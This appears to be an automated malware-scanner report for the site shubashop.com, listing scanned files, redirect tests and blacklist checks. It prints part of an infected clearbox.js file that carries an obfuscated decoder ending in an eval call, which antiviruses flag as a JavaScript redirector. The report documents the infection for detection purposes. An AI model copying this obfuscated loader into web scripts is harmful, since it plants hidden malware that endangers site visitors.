New scan:

Malware Scanner report for shubashop.com

Malicious/Suspicious/Total urls checked
1/0/4
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://shubashop.com/
200 OK
Content-Length: 95141
Content-Type: text/html
clean
http://shubashop.com/js/clearbox.js?config=default
200 OK
Content-Length: 12141
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var CB_ScriptDir='/js/clearbox';
var CB_Language='en';
var CB_Scripts = document.getElementsByTagName('script');
for(i=0;i<CB_Scripts.length;i++){
if (CB_Scripts[i].getAttribute('src')){
var q=CB_Scripts[i].getAttribute('src');
if(q.match('clearbox.js')){
var url = q.split('clearbox.js');
var path = url[0];
var query = url[1].substring(1);
var pars = query.split('&');
for(j=0; j<pars.length; j++) {
par =
... 3246 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

Avast
JS:Redirector-AKC [Trj]
GData
JS:Redirector-AKC

http://counter.rambler.ru/top100.jcn?2432306
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean
http://shubashop.com/test404page.js
404 Not Found
Content-Length: 2315
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: shubashop.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 30 Sep 2014 03:01:32 GMT
Accept-Ranges: bytes
ETag: "173a5-49ed7f1661900"
Server: nginx
Vary: Accept-Encoding
Content-Language: ru
Content-Length: 95141
Content-Type: text/html
Last-Modified: Sat, 19 Mar 2011 15:56:52 GMT
X-MJ-Serve-Req-Time: D=12984 usec
X-MJ-Upstream-Addr: 10.10.0.27:81

...95141 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: shubashop.com
Referer: http://www.google.com/search?q=shubashop.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=shubashop.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://shubashop.com/

Result: shubashop.com is not infected or malware details are not published yet.